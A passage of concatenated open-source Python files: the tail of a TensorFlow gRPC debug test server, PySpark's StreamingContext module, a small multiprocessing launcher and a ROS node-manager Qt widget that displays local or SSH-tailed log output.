int(hashlib.md5(encoded_graph_def).hexdigest(), 16) event = event_pb2.Event(graph_def=encoded_graph_def, wall_time=wall_time) graph_file_path = os.path.join( self._dump_dir, debug_data.device_name_to_device_path(device_name), debug_data.METADATA_FILE_PREFIX + debug_data.GRAPH_FILE_TAG + debug_data.HASH_TAG + "%d_%d" % (graph_hash, wall_time)) self._try_makedirs(os.path.dirname(graph_file_path)) with open(graph_file_path, "wb") as f: f.write(event.SerializeToString()) def _write_value_event(self, event): value = event.summary.value[0] # Obtain the device name from the metadata. summary_metadata = event.summary.value[0].metadata if not summary_metadata.plugin_data: raise ValueError("The value lacks plugin data.") try: content = json.loads(compat.as_text(summary_metadata.plugin_data.content)) except ValueError as err: raise ValueError("Could not parse content into JSON: %r, %r" % (content, err)) device_name = content["device"] dump_full_path = _get_dump_file_path( self._dump_dir, device_name, value.node_name) self._try_makedirs(os.path.dirname(dump_full_path)) with open(dump_full_path, "wb") as f: f.write(event.SerializeToString()) class EventListenerTestServicer(grpc_debug_server.EventListenerBaseServicer): """An implementation of EventListenerBaseServicer for testing.""" def __init__(self, server_port, dump_dir, toggle_watch_on_core_metadata=None): """Constructor of EventListenerTestServicer. Args: server_port: (int) The server port number. dump_dir: (str) The root directory to which the data files will be dumped. If empty or None, the received debug data will not be dumped to the file system: they will be stored in memory instead. toggle_watch_on_core_metadata: A list of (node_name, output_slot, debug_op) tuples to toggle the watchpoint status during the on_core_metadata calls (optional). """ self.core_metadata_json_strings = [] self.partition_graph_defs = [] self.debug_tensor_values = collections.defaultdict(list) self._initialize_toggle_watch_state(toggle_watch_on_core_metadata) grpc_debug_server.EventListenerBaseServicer.__init__( self, server_port, functools.partial(EventListenerTestStreamHandler, dump_dir, self)) # Members for storing the graph ops traceback and source files. self._call_types = [] self._call_keys = [] self._origin_stacks = [] self._origin_id_to_strings = [] self._graph_tracebacks = [] self._graph_versions = [] self._source_files = [] def _initialize_toggle_watch_state(self, toggle_watches): self._toggle_watches = toggle_watches self._toggle_watch_state = dict() if self._toggle_watches: for watch_key in self._toggle_watches: self._toggle_watch_state[watch_key] = False def toggle_watch(self): for watch_key in self._toggle_watch_state: node_name, output_slot, debug_op = watch_key if self._toggle_watch_state[watch_key]: self.request_unwatch(node_name, output_slot, debug_op) else: self.request_watch(node_name, output_slot, debug_op) self._toggle_watch_state[watch_key] = ( not self._toggle_watch_state[watch_key]) def clear_data(self): self.core_metadata_json_strings = [] self.partition_graph_defs = [] self.debug_tensor_values = collections.defaultdict(list) self._call_types = [] self._call_keys = [] self._origin_stacks = [] self._origin_id_to_strings = [] self._graph_tracebacks = [] self._graph_versions = [] self._source_files = [] def SendTracebacks(self, request, context): self._call_types.append(request.call_type) self._call_keys.append(request.call_key) self._origin_stacks.append(request.origin_stack) self._origin_id_to_strings.append(request.origin_id_to_string) self._graph_tracebacks.append(request.graph_traceback) self._graph_versions.append(request.graph_version) return debug_service_pb2.EventReply() def SendSourceFiles(self, request, context): self._source_files.append(request) return debug_service_pb2.EventReply() def query_op_traceback(self, op_name): """Query the traceback of an op. Args: op_name: Name of the op to query. Returns: The traceback of the op, as a list of 3-tuples: (filename, lineno, function_name) Raises: ValueError: If the op cannot be found in the tracebacks received by the server so far. """ for op_log_proto in self._graph_tracebacks: for log_entry in op_log_proto.log_entries: if log_entry.name == op_name: return self._code_def_to_traceback(log_entry.code_def, op_log_proto.id_to_string) raise ValueError( "Op '%s' does not exist in the tracebacks received by the debug " "server." % op_name) def query_origin_stack(self): """Query the stack of the origin of the execution call. Returns: A `list` of all tracebacks. Each item corresponds to an execution call, i.e., a `SendTracebacks` request. Each item is a `list` of 3-tuples: (filename, lineno, function_name). """ ret = [] for stack, id_to_string in zip( self._origin_stacks, self._origin_id_to_strings): ret.append(self._code_def_to_traceback(stack, id_to_string)) return ret def query_call_types(self): return self._call_types def query_call_keys(self): return self._call_keys def query_graph_versions(self): return self._graph_versions def query_source_file_line(self, file_path, lineno): """Query the content of a given line in a source file. Args: file_path: Path to the source file. lineno: Line number as an `int`. Returns: Content of the line as a string. Raises: ValueError: If no source file is found at the given file_path. """ if not self._source_files: raise ValueError( "This debug server has not received any source file contents yet.") for source_files in self._source_files: for source_file_proto in source_files.source_files: if source_file_proto.file_path == file_path: return source_file_proto.lines[lineno - 1] raise ValueError( "Source file at path %s has not been received by the debug server", file_path) def _code_def_to_traceback(self, code_def, id_to_string): return [(id_to_string[trace.file_id], trace.lineno, id_to_string[trace.function_id]) for trace in code_def.traces] def start_server_on_separate_thread(dump_to_filesystem=True, server_start_delay_sec=0.0, poll_server=False, blocking=True, toggle_watch_on_core_metadata=None): """Create a test gRPC debug server and run on a separate thread. Args: dump_to_filesystem: (bool) whether the debug server will dump debug data to the filesystem. server_start_delay_sec: (float) amount of time (in sec) to delay the server start up for. poll_server: (bool) whether the server will be polled till success on startup. blocking: (bool) whether the server should be started in a blocking mode. toggle_watch_on_core_metadata: A list of (node_name, output_slot, debug_op) tuples to toggle the watchpoint status during the on_core_metadata calls (optional). Returns: server_port: (int) Port on which the server runs. debug_server_url: (str) grpc:// URL to the server. server_dump_dir: (str) The debug server's dump directory. server_thread: The server Thread object. server: The `EventListenerTestServicer` object. Raises: ValueError: If polling the server process for ready state is not successful within maximum polling count. """ server_port = portpicker.pick_unused_port() debug_server_url = "grpc://localhost:%d" % server_port server_dump_dir = tempfile.mkdtemp() if dump_to_filesystem else None server = EventListenerTestServicer( server_port=server_port, dump_dir=server_dump_dir, toggle_watch_on_core_metadata=toggle_watch_on_core_metadata) def delay_then_run_server(): time.sleep(server_start_delay_sec) server.run_server(blocking=blocking) server_thread = threading.Thread(target=delay_then_run_server) server_thread.start() if poll_server: if not _poll_server_till_success( 50, 0.2, debug_server_url, server_dump_dir, server, gpu_memory_fraction=0.1): raise ValueError( "Failed to start test gRPC debug server at port %d" % server_port) server.clear_data() return server_port, debug_server_url, server_dump_dir, server_thread, server def _poll_server_till_success(max_attempts, sleep_per_poll_sec, debug_server_url, dump_dir, server, gpu_memory_fraction=1.0): """Poll server until success or exceeding max polling count. Args: max_attempts: (int) How many times to poll at maximum sleep_per_poll_sec: (float) How many seconds to sleep for after each unsuccessful poll. debug_server_url: (str) gRPC URL to the debug server. dump_dir: (str) Dump directory to look for files in. If None, will directly check data from the server object. server: The server object. gpu_memory_fraction: (float) Fraction of GPU memory to be allocated for the Session used in server polling. Returns: (bool) Whether the polling succeeded within max_polls attempts. """ poll_count = 0 config = config_pb2.ConfigProto(gpu_options=config_pb2.GPUOptions( per_process_gpu_memory_fraction=gpu_memory_fraction)) with session.Session(config=config) as sess: for poll_count in range(max_attempts): server.clear_data() print("Polling: poll_count = %d" % poll_count) x_init_name = "x_init_%d" % poll_count x_init = constant_op.constant([42.0], shape=[1], name=x_init_name) x = variables.Variable(x_init, name=x_init_name) run_options = config_pb2.RunOptions() debug_utils.add_debug_tensor_watch( run_options, x_init_name, 0, debug_urls=[debug_server_url]) try: sess.run(x.initializer, options=run_options) except errors.FailedPreconditionError: pass if dump_dir: if os.path.isdir( dump_dir) and debug_data.DebugDumpDir(dump_dir).size > 0: shutil.rmtree(dump_dir) print("Poll succeeded.") return True else: print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec) time.sleep(sleep_per_poll_sec) else: if server.debug_tensor_values: print("Poll succeeded.") return True else: print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec) time.sleep(sleep_per_poll_sec) return False
context.py
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from __future__ import print_function import os import sys from py4j.java_gateway import java_import, JavaObject from pyspark import RDD, SparkConf from pyspark.serializers import NoOpSerializer, UTF8Deserializer, CloudPickleSerializer from pyspark.context import SparkContext from pyspark.storagelevel import StorageLevel from pyspark.streaming.dstream import DStream from pyspark.streaming.util import TransformFunction, TransformFunctionSerializer __all__ = ["StreamingContext"] def _daemonize_callback_server(): """ Hack Py4J to daemonize callback server The thread of callback server has daemon=False, it will block the driver from exiting if it's not shutdown. The following code replace `start()` of CallbackServer with a new version, which set daemon=True for this thread. Also, it will update the port number (0) with real port """ # TODO: create a patch for Py4J import socket import py4j.java_gateway logger = py4j.java_gateway.logger from py4j.java_gateway import Py4JNetworkError from threading import Thread def start(self): """Starts the CallbackServer. This method should be called by the client instead of run().""" self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) try: self.server_socket.bind((self.address, self.port)) if not self.port: # update port with real port self.port = self.server_socket.getsockname()[1] except Exception as e: msg = 'An error occurred while trying to start the callback server: %s' % e logger.exception(msg) raise Py4JNetworkError(msg) # Maybe thread needs to be cleanup up? self.thread = Thread(target=self.run) self.thread.daemon = True self.thread.start() py4j.java_gateway.CallbackServer.start = start class StreamingContext(object): """ Main entry point for Spark Streaming functionality. A StreamingContext represents the connection to a Spark cluster, and can be used to create L{DStream} various input sources. It can be from an existing L{SparkContext}. After creating and transforming DStreams, the streaming computation can be started and stopped using `context.start()` and `context.stop()`, respectively. `context.awaitTermination()` allows the current thread to wait for the termination of the context by `stop()` or by an exception. """ _transformerSerializer = None # Reference to a currently active StreamingContext _activeContext = None def __init__(self, sparkContext, batchDuration=None, jssc=None): """ Create a new StreamingContext. @param sparkContext: L{SparkContext} object. @param batchDuration: the time interval (in seconds) at which streaming data will be divided into batches """ self._sc = sparkContext self._jvm = self._sc._jvm self._jssc = jssc or self._initialize_context(self._sc, batchDuration) def _initialize_context(self, sc, duration): self._ensure_initialized() return self._jvm.JavaStreamingContext(sc._jsc, self._jduration(duration)) def _jduration(self, seconds): """ Create Duration object given number of seconds """ return self._jvm.Duration(int(seconds * 1000)) @classmethod def _ensure_initialized(cls): SparkContext._ensure_initialized() gw = SparkContext._gateway java_import(gw.jvm, "org.apache.spark.streaming.*") java_import(gw.jvm, "org.apache.spark.streaming.api.java.*") java_import(gw.jvm, "org.apache.spark.streaming.api.python.*") # start callback server # getattr will fallback to JVM, so we cannot test by hasattr() if "_callback_server" not in gw.__dict__: _daemonize_callback_server() # use random port gw._start_callback_server(0) # gateway with real port gw._python_proxy_port = gw._callback_server.port # get the GatewayServer object in JVM by ID jgws = JavaObject("GATEWAY_SERVER", gw._gateway_client) # update the port of CallbackClient with real port gw.jvm.PythonDStream.updatePythonGatewayPort(jgws, gw._python_proxy_port) # register serializer for TransformFunction # it happens before creating SparkContext when loading from checkpointing cls._transformerSerializer = TransformFunctionSerializer( SparkContext._active_spark_context, CloudPickleSerializer(), gw) @classmethod def getOrCreate(cls, checkpointPath, setupFunc): """ Either recreate a StreamingContext from checkpoint data or create a new StreamingContext. If checkpoint data exists in the provided `checkpointPath`, then StreamingContext will be recreated from the checkpoint data. If the data does not exist, then the provided setupFunc will be used to create a new context. @param checkpointPath: Checkpoint directory used in an earlier streaming program @param setupFunc: Function to create a new context and setup DStreams """ # TODO: support checkpoint in HDFS if not os.path.exists(checkpointPath) or not os.listdir(checkpointPath): ssc = setupFunc() ssc.checkpoint(checkpointPath) return ssc cls._ensure_initialized() gw = SparkContext._gateway try: jssc = gw.jvm.JavaStreamingContext(checkpointPath) except Exception: print("failed to load StreamingContext from checkpoint", file=sys.stderr) raise jsc = jssc.sparkContext() conf = SparkConf(_jconf=jsc.getConf()) sc = SparkContext(conf=conf, gateway=gw, jsc=jsc) # update ctx in serializer SparkContext._active_spark_context = sc cls._transformerSerializer.ctx = sc return StreamingContext(sc, None, jssc) @classmethod def getActive(cls): """ Return either the currently active StreamingContext (i.e., if there is a context started but not stopped) or None. """ activePythonContext = cls._activeContext if activePythonContext is not None: # Verify that the current running Java StreamingContext is active and is the same one # backing the supposedly active Python context activePythonContextJavaId = activePythonContext._jssc.ssc().hashCode() activeJvmContextOption = activePythonContext._jvm.StreamingContext.getActive() if activeJvmContextOption.isEmpty(): cls._activeContext = None elif activeJvmContextOption.get().hashCode() != activePythonContextJavaId: cls._activeContext = None raise Exception("JVM's active JavaStreamingContext is not the JavaStreamingContext " "backing the action Python StreamingContext. This is unexpected.") return cls._activeContext @classmethod def getActiveOrCreate(cls, checkpointPath, setupFunc): """ Either return the active StreamingContext (i.e. currently started but not stopped), or recreate a StreamingContext from checkpoint data or create a new StreamingContext using the provided setupFunc function. If the checkpointPath is None or does not contain valid checkpoint data, then setupFunc will be called to create a new context and setup DStreams. @param checkpointPath: Checkpoint directory used in an earlier streaming program. Can be None if the intention is to always create a new context when there is no active context. @param setupFunc: Function to create a new JavaStreamingContext and setup DStreams """ if setupFunc is None: raise Exception("setupFunc cannot be None") activeContext = cls.getActive() if activeContext is not None: return activeContext elif checkpointPath is not None: return cls.getOrCreate(checkpointPath, setupFunc) else: return setupFunc() @property def sparkContext(self): """ Return SparkContext which is associated with this StreamingContext. """ return self._sc def start(self): """ Start the execution of the streams. """ self._jssc.start() StreamingContext._activeContext = self def awaitTermination(self, timeout=None): """ Wait for the execution to stop. @param timeout: time to wait in seconds """ if timeout is None: self._jssc.awaitTermination() else: self._jssc.awaitTerminationOrTimeout(int(timeout * 1000)) def awaitTerminationOrTimeout(self, timeout): """ Wait for the execution to stop. Return `true` if it's stopped; or throw the reported error during the execution; or `false` if the waiting time elapsed before returning from the method. @param timeout: time to wait in seconds """ self._jssc.awaitTerminationOrTimeout(int(timeout * 1000)) def stop(self, stopSparkContext=True, stopGraceFully=False): """ Stop the execution of the streams, with option of ensuring all received data has been processed. @param stopSparkContext: Stop the associated SparkContext or not @param stopGracefully: Stop gracefully by waiting for the processing of all received data to be completed """ self._jssc.stop(stopSparkContext, stopGraceFully) StreamingContext._activeContext = None if stopSparkContext: self._sc.stop() def remember(self, duration): """ Set each DStreams in this context to remember RDDs it generated in the last given duration. DStreams remember RDDs only for a limited duration of time and releases them for garbage collection. This method allows the developer to specify how to long to remember the RDDs (if the developer wishes to query old data outside the DStream computation). @param duration: Minimum duration (in seconds) that each DStream should remember its RDDs """ self._jssc.remember(self._jduration(duration)) def checkpoint(self, directory): """ Sets the context to periodically checkpoint the DStream operations for master fault-tolerance. The graph will be checkpointed every batch interval. @param directory: HDFS-compatible directory where the checkpoint data will be reliably stored """ self._jssc.checkpoint(directory) def socketTextStream(self, hostname, port, storageLevel=StorageLevel.MEMORY_AND_DISK_SER_2): """ Create an input from TCP source hostname:port. Data is received using a TCP socket and receive byte is interpreted as UTF8 encoded ``\\n`` delimited lines. @param hostname: Hostname to connect to for receiving data @param port: Port to connect to for receiving data @param storageLevel: Storage level to use for storing the received objects """ jlevel = self._sc._getJavaStorageLevel(storageLevel) return DStream(self._jssc.socketTextStream(hostname, port, jlevel), self, UTF8Deserializer()) def textFileStream(self, directory): """ Create an input stream that monitors a Hadoop-compatible file system for new files and reads them as text files. Files must be wrriten to the monitored directory by "moving" them from another location within the same file system. File names starting with . are ignored. """ return DStream(self._jssc.textFileStream(directory), self, UTF8Deserializer()) def binaryRecordsStream(self, directory, recordLength): """ Create an input stream that monitors a Hadoop-compatible file system for new files and reads them as flat binary files with records of fixed length. Files must be written to the monitored directory by "moving" them from another location within the same file system. File names starting with . are ignored. @param directory: Directory to load data from @param recordLength: Length of each record in bytes """ return DStream(self._jssc.binaryRecordsStream(directory, recordLength), self, NoOpSerializer()) def _check_serializers(self, rdds): # make sure they have same serializer if len(set(rdd._jrdd_deserializer for rdd in rdds)) > 1: for i in range(len(rdds)): # reset them to sc.serializer rdds[i] = rdds[i]._reserialize() def queueStream(self, rdds, oneAtATime=True, default=None): """ Create an input stream from an queue of RDDs or list. In each batch, it will process either one or all of the RDDs returned by the queue. NOTE: changes to the queue after the stream is created will not be recognized. @param rdds: Queue of RDDs @param oneAtATime: pick one rdd each time or pick all of them once. @param default: The default rdd if no more in rdds """ if default and not isinstance(default, RDD): default = self._sc.parallelize(default) if not rdds and default: rdds = [rdds] if rdds and not isinstance(rdds[0], RDD): rdds = [self._sc.parallelize(input) for input in rdds] self._check_serializers(rdds) queue = self._jvm.PythonDStream.toRDDQueue([r._jrdd for r in rdds]) if default: default = default._reserialize(rdds[0]._jrdd_deserializer) jdstream = self._jssc.queueStream(queue, oneAtATime, default._jrdd) else: jdstream = self._jssc.queueStream(queue, oneAtATime) return DStream(jdstream, self, rdds[0]._jrdd_deserializer) def transform(self, dstreams, transformFunc): """ Create a new DStream in which each RDD is generated by applying a function on RDDs of the DStreams. The order of the JavaRDDs in the transform function parameter will be the same as the order of corresponding DStreams in the list. """ jdstreams = [d._jdstream for d in dstreams] # change the final serializer to sc.serializer func = TransformFunction(self._sc, lambda t, *rdds: transformFunc(rdds).map(lambda x: x), *[d._jrdd_deserializer for d in dstreams]) jfunc = self._jvm.TransformFunction(func) jdstream = self._jssc.transform(jdstreams, jfunc) return DStream(jdstream, self, self._sc.serializer) def union(self, *dstreams): """ Create a unified DStream from multiple DStreams of the same type and same slide duration. """ if not dstreams: raise ValueError("should have at least one DStream to union") if len(dstreams) == 1: return dstreams[0] if len(set(s._jrdd_deserializer for s in dstreams)) > 1: raise ValueError("All DStreams should have same serializer") if len(set(s._slideDuration for s in dstreams)) > 1: raise ValueError("All DStreams should have same slide duration") first = dstreams[0] jrest = [d._jdstream for d in dstreams[1:]] return DStream(self._jssc.union(first._jdstream, jrest), self, first._jrdd_deserializer)
main.py
from multiprocessing import Process, Queue from node import Node NUM_NODES = 100 if __name__ == '__main__': communal_inbox = dict((i, Queue()) for i in range(NUM_NODES)) jobs = [Process(target=Node, args=(communal_inbox, i)) for i in range(NUM_NODES)] for j in jobs: j.start() for j in jobs: j.join()
screen_widget.py
# Software License Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Fraunhofer nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from datetime import datetime from python_qt_binding import loadUi from python_qt_binding.QtCore import Qt, Signal, QFile, QIODevice, QRegExp from python_qt_binding.QtGui import QColor, QIcon, QPalette, QTextCursor, QTextCharFormat, QTextDocument, QKeySequence try: from python_qt_binding.QtGui import QWidget, QTextEdit, QDialog, QShortcut except ImportError: from python_qt_binding.QtWidgets import QWidget, QTextEdit, QDialog, QShortcut import os import rospy import shlex import sys import subprocess import threading import time from .screen_highlighter import ScreenHighlighter from .terminal_formats import TerminalFormats from .logger_handler import LoggerHandler import fkie_node_manager as nm from fkie_node_manager_daemon import screen from fkie_node_manager_daemon.common import sizeof_fmt from fkie_node_manager_daemon.host import get_hostname class ScreenTextBrowser(QTextEdit): def __init__(self, parent=None): QTextEdit.__init__(self, parent) self._reader = None self.setAutoFillBackground(False) self.setReadOnly(True) self.setUndoRedoEnabled(False) self.setAutoFormatting(QTextEdit.AutoNone) self.setAcceptRichText(False) # self.textBrowser.document().setMaximumBlockCount(100) p = QPalette() p.setColor(QPalette.Base, Qt.black) p.setColor(QPalette.Text, Qt.white) self.setPalette(p) # self.setFontFamily('Monospace') # self.setFontPointSize(12) def set_reader(self, reader): self._reader = reader def keyPressEvent(self, event): if self._reader is not None: if event.key() == Qt.Key_PageUp and self.verticalScrollBar().value() == 0: self._reader.reverse_read(self.verticalScrollBar().pageStep() / 10) elif event.key() == Qt.Key_Home and event.modifiers() == Qt.ShiftModifier: self._reader.reverse_read(-1) QTextEdit.keyPressEvent(self, event) def wheelEvent(self, event): if self._reader is not None: lines = event.angleDelta().y() / 40 if lines > 0 and self.verticalScrollBar().value() == 0: self._reader.reverse_read(lines) QTextEdit.wheelEvent(self, event) class ScreenWidget(QWidget): ''' Shows the output of a screen. ''' clear_signal = Signal() cleared_signal = Signal() output = Signal(str) output_prefix = Signal(str) error_signal = Signal(str) auth_signal = Signal(str, str, str) # host, nodename, user def __init__(self, masteruri, screen_name, nodename, user=None, parent=None): ''' Creates the window, connects the signals and init the class. ''' QWidget.__init__(self, parent) # load the UI file screen_dock_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'ui', 'logscreen', 'ScreenWidget.ui') loadUi(screen_dock_file, self) self.setObjectName("ScreenWidget") self.setWindowIcon(nm.settings().icon('crystal_clear_show_io.png')) # self.setFeatures(QDockWidget.DockWidgetFloatable | QDockWidget.DockWidgetMovable | QDockWidget.DockWidgetClosable) self.pauseButton.setIcon(nm.settings().icon('sekkyumu_pause.png')) self._valid = True self._lock = threading.RLock() self.finished = False self.qfile = None self.thread = None self._info = '' self._masteruri = '' self._nodename = nodename self._first_fill = True self._seek_start = -1 self._seek_end = -1 self._pause_read_end = False self._ssh_output_file = None self._ssh_error_file = None self._ssh_input_file = None self._on_pause = False self._char_format_end = None self.logframe.setVisible(False) self.loglevelButton.toggled.connect(self.on_toggle_loggers) self.logger_handler = None # connect to the button signals self.output.connect(self._on_output) self.output_prefix.connect(self._on_output_prefix) self.error_signal.connect(self._on_error) self.auth_signal.connect(self.on_request_pw) self.clearCloseButton.clicked.connect(self.clear) # self.pauseButton.clicked.connect(self.stop) self.pauseButton.toggled.connect(self.pause) self.clear_signal.connect(self.clear) self.loggerFilterInput.textChanged.connect(self.on_logger_filter_changed) self.textBrowser.verticalScrollBar().valueChanged.connect(self.on_scrollbar_position_changed) self.textBrowser.verticalScrollBar().rangeChanged.connect(self.on_scrollbar_range_changed) self.textBrowser.set_reader(self) self.tf = TerminalFormats() self.hl = ScreenHighlighter(self.textBrowser.document()) self.searchFrame.setVisible(False) self.grepFrame.setVisible(False) self.grepLineEdit.textChanged.connect(self.on_grep_changed) self._shortcut_search = QShortcut(QKeySequence(self.tr("Ctrl+F", "Activate search")), self) self._shortcut_search.activated.connect(self.on_search) self._shortcut_grep = QShortcut(QKeySequence(self.tr("Ctrl+G", "Activate grep")), self) self._shortcut_grep.activated.connect(self.on_grep) self.searchLineEdit.editingFinished.connect(self.on_search_prev) self.searchNextButton.clicked.connect(self.on_search_next) self.searchPrevButton.clicked.connect(self.on_search_prev) # self.visibilityChanged.connect(self.stop) self._connect(masteruri, screen_name, nodename, user) def masteruri(self): return self._masteruri def name(self): return self._nodename def clear(self): ''' Removes all messages and emit the `cleared_signal`. ''' self.textBrowser.clear() self.infoLabel.setText('') self.cleared_signal.emit() def finish(self): self.finished = True self.output.disconnect() self.output_prefix.disconnect() self.close() def closeEvent(self, event): self.stop() QWidget.closeEvent(self, event) def hide(self): self.stop() QWidget.hide(self) def close(self): self.stop() QWidget.close(self) def on_search(self): self.searchFrame.setVisible(not self.searchFrame.isVisible()) if self.searchFrame.isVisible(): self.searchLineEdit.setFocus() self.searchLineEdit.selectAll() else: cursor = self.textBrowser.textCursor() cursor.clearSelection() self.textBrowser.setTextCursor(cursor) self.textBrowser.setFocus() def on_search_next(self): self._perform_search(forward=True) def on_search_prev(self): self._perform_search(forward=False) def _perform_search(self, forward=False): search_str = self.searchLineEdit.text() if search_str: cursor = self.textBrowser.textCursor() if forward: search_result = self.textBrowser.document().find(search_str, cursor) else: search_result = self.textBrowser.document().find(search_str, cursor, QTextDocument.FindBackward) if search_result.position() > -1: self.textBrowser.setTextCursor(search_result) self.searchLabel.setText('') # self.searchLabel.setText('%d' % search_result.position()) else: self.searchLabel.setText('no results') else: self.searchLabel.setText('') def on_grep(self): self.grepFrame.setVisible(not self.grepFrame.isVisible()) if self.grepFrame.isVisible(): self.grepLineEdit.setFocus() self.on_grep_changed(self.grepLineEdit.text()) self.hl.set_grep_text('') self.grepLineEdit.selectAll() else: self.on_grep_changed('') self.textBrowser.setFocus() def on_grep_changed(self, text): self.hl.set_grep_text(text) def stop(self): ''' ''' if self.finished: return if self.qfile is not None and self.qfile.isOpen(): self.qfile.close() self.qfile = None self._seek_start = -1 self._seek_end = -1 self._pause_read_end = False # self.clear() try: self._ssh_output_file.close() self._ssh_error_file.close() # send Ctrl+C to remote process self._ssh_input_file.write('%s\n' % chr(3)) self._ssh_input_file.close() except Exception: pass self.finished = True def pause(self, state): self._on_pause = state def valid(self): return self._valid def _connect(self, masteruri, screen_name, nodename, user=None): self._masteruri = masteruri if self.qfile is not None and self.qfile.isOpen(): self.qfile.close() self.clear_signal.emit() host = get_hostname(masteruri) if nm.is_local(host): self._nodename = nodename if screen_name: screen_log = screen.get_logfile(node=nodename) else: screen_log = screen.get_ros_logfile(node=nodename) self.qfile = QFile(screen_log) self.setWindowTitle(nodename) if self.qfile.open(QIODevice.ReadOnly): self._first_fill = True self.qfile.seek(self.qfile.size()-1) # self.lread() self._info = "END" self.thread = threading.Thread(target=self._read_log, kwargs={"filename": screen_log}) self.thread.setDaemon(True) self.thread.start() else: self._valid = False else: self._connect_ssh(host, nodename, user) self.logger_handler = LoggerHandler(nodename, masteruri=masteruri, layout=self.scrollAreaWidgetContents.layout()) self.logger_handler.update() return False def _read_log(self, filename, lines=80): while self.qfile is not None and self.qfile.isOpen(): with self._lock: if self._first_fill: chars_count = self._seek_count_lines(lines) self._seek_start = self.qfile.pos() data = self.qfile.read(chars_count) if sys.version_info > (3, 0): data = data.decode('utf-8') self.output.emit(data) self._seek_end = self.qfile.pos() self._first_fill = False else: if self._seek_end != -1: self.qfile.seek(self._seek_end) if (not self._pause_read_end and self.qfile.bytesAvailable()): start = self.qfile.pos() data = self.qfile.readAll().data() if sys.version_info > (3, 0): data = data.decode('utf-8') self.output.emit(data) self._seek_end = self.qfile.pos() self._info = "NEW: %d" % (self._seek_end - start) time.sleep(0.25) def reverse_read(self, lines=20): with self._lock: if self.qfile is not None and self.qfile.isOpen(): if lines == -1: self.qfile.seek(0) chars_count = self._seek_start else: self.qfile.seek(self._seek_start) chars_count = self._seek_count_lines(lines) self._seek_start = self.qfile.pos() data = self.qfile.read(chars_count) if sys.version_info > (3, 0): data = data.decode('utf-8') self.output_prefix.emit(data) def _seek_count_lines(self, lines=20): if self.qfile.pos() < 2: self.qfile.seek(0) return self.qfile.pos() count = 0 chars_count = 2 line_size = 0 count_reached = False self.qfile.seek(self.qfile.pos() - 2) while (not count_reached) and (self.qfile.pos() > 0): ch = self.qfile.read(1) self.qfile.seek(self.qfile.pos() - 2) chars_count += 1 line_size += 1 if line_size > 120: count += 1 line_size = 0 if ch == b'\n': count += 1 line_size = 0 if count >= lines: count_reached = True return chars_count + 1 def _on_output_prefix(self, msg): ''' This text will be prepended ''' if self.finished or self._on_pause: return if msg: cursor = QTextCursor(self.textBrowser.document()) self.tf.insert_formated(cursor, msg.rstrip()) self.textBrowser.setTextCursor(cursor) self.textBrowser.moveCursor(QTextCursor.Start) self._update_info_label() def _on_output(self, msg): ''' This text will be appended. ''' if self.finished or self._on_pause: return if msg: at_end = self.textBrowser.verticalScrollBar().value() > self.textBrowser.verticalScrollBar().maximum() - 20 cursor_select = self.textBrowser.textCursor() # store selection and do not scroll to the appended text if not cursor_select.hasSelection(): cursor_select = None cursor = self.textBrowser.textCursor() cursor.movePosition(QTextCursor.End) if self.hl.has_grep_text(): # grep new text lines = msg.splitlines(True) for line in lines: if self.hl.contains_grep_text(line): self._char_format_end = self.tf.insert_formated(cursor, line, char_format=None) else: self._char_format_end = self.tf.insert_formated(cursor, msg, char_format=self._char_format_end) if cursor_select is not None: # restore selection self.textBrowser.setTextCursor(cursor_select) elif at_end: self.textBrowser.moveCursor(QTextCursor.End) self._update_info_label() if not self.finished: self.show() def on_scrollbar_position_changed(self, value): self._update_info_label() def on_scrollbar_range_changed(self, min, max): self._update_info_label() def _on_error(self, msg): self.textBrowser.append(msg) self._update_info_label('SSH ERROR') def _update_info_label(self, info=''): info_text = info vbar_value = self.textBrowser.verticalScrollBar().value() if not info_text: if vbar_value == 0: if self._seek_start == 0: info_text = 'START' else: info_text += "%d %%" % (self._seek_start * 100 / self._seek_end) elif vbar_value == self.textBrowser.verticalScrollBar().maximum(): info_text = 'END' else: info_text = "%d / %d" % (vbar_value / 20, self.textBrowser.verticalScrollBar().maximum() / 20) seek_info = '' if self._seek_end > -1: seek_info = '\t%s / %s' % (sizeof_fmt(self._seek_end - self._seek_start), sizeof_fmt(self._seek_end)) elif self._ssh_output_file is not None: seek_info = '\ttail via SSH' self.infoLabel.setText(info_text + seek_info) 